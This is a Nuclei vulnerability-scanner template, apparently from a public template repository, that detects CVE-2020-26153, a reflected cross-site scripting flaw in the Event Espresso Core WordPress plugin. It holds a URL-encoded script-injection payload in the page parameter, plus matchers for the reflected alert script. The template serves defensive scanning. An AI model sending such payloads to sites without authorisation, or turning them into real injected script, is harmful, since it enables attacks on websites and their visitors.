nuclei-templates/cves/2020/CVE-2020-26153.yaml

34 lines
1.2 KiB
YAML
Raw Normal View History

2021-07-27 11:19:44 +00:00
id: CVE-2020-26153
info:
name: Event Espresso Core-Reg XSS
author: pikpikcu
severity: medium
description: |
cross-site scripting (XSS) vulnerability in wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php in the Event Espresso Core plugin before 4.10.7.p for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference:
2021-07-27 11:50:54 +00:00
- https://labs.nettitude.com/blog/cve-2020-26153-event-espresso-core-cross-site-scripting/
- https://nvd.nist.gov/vuln/detail/CVE-2020-26153
tags: cve,cve2020,xss,wordpress,wp-plugin
2021-07-27 11:19:44 +00:00
requests:
- method: GET
path:
2021-07-27 11:50:54 +00:00
- "{{BaseURL}}/wp-content/plugins/event-espresso-core-reg/admin_pages/messages/templates/ee_msg_admin_overview.template.php?page=%22%2F%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%3Cb"
2021-07-27 11:19:44 +00:00
matchers-condition: and
matchers:
- type: word
words:
2021-07-27 11:50:54 +00:00
- '"/></script><script>alert(document.domain)</script>'
2021-07-27 11:19:44 +00:00
part: body
- type: status
status:
- 500
- type: word
part: header
words:
- text/html